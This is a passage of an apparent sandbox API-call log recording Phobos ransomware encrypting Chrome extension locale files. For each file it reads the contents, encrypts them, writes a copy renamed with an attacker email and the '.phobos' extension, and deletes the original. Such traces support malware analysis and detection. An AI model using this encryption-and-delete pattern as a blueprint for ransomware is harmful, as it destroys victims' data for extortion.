data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.236] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.236] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.236] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11d, lpOverlapped=0x0) returned 1 [0151.237] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.237] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.237] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0151.237] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.237] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.237] CryptDestroyKey (hKey=0xa32968) returned 1 [0151.237] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.238] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.238] CloseHandle (hObject=0x138) returned 1 [0151.238] CloseHandle (hObject=0x134) returned 1 [0151.238] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json")) returned 1 [0151.239] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.239] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=258) returned 1 [0151.239] CloseHandle (hObject=0x134) returned 1 [0151.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json")) returned 0x2020 [0151.239] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.239] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.239] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.240] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.240] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x102, lpOverlapped=0x0) returned 1 [0151.241] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.241] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.242] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0151.242] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.242] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.242] CryptDestroyKey (hKey=0xa32968) returned 1 [0151.242] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.242] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.242] CloseHandle (hObject=0x134) returned 1 [0151.242] CloseHandle (hObject=0x138) returned 1 [0151.242] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json")) returned 1 [0151.243] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.243] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=254) returned 1 [0151.243] CloseHandle (hObject=0x138) returned 1 [0151.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json")) returned 0x2020 [0151.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.244] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.244] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.244] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.244] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfe, lpOverlapped=0x0) returned 1 [0151.248] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.248] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.250] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.250] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.250] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.250] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.250] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.250] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.250] CloseHandle (hObject=0x138) returned 1 [0151.250] CloseHandle (hObject=0x134) returned 1 [0151.251] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json")) returned 1 [0151.251] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.252] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=242) returned 1 [0151.252] CloseHandle (hObject=0x134) returned 1 [0151.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json")) returned 0x2020 [0151.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.252] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.252] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.256] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.256] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf2, lpOverlapped=0x0) returned 1 [0151.257] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.257] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.258] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.258] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.258] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.258] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.258] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.258] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.258] CloseHandle (hObject=0x134) returned 1 [0151.258] CloseHandle (hObject=0x138) returned 1 [0151.258] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json")) returned 1 [0151.259] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.259] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=218) returned 1 [0151.259] CloseHandle (hObject=0x138) returned 1 [0151.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json")) returned 0x2020 [0151.260] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.260] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.260] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.260] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.260] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.260] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xda, lpOverlapped=0x0) returned 1 [0151.261] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0151.261] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0151.262] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.262] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.262] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.262] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.262] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.262] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.262] CloseHandle (hObject=0x138) returned 1 [0151.262] 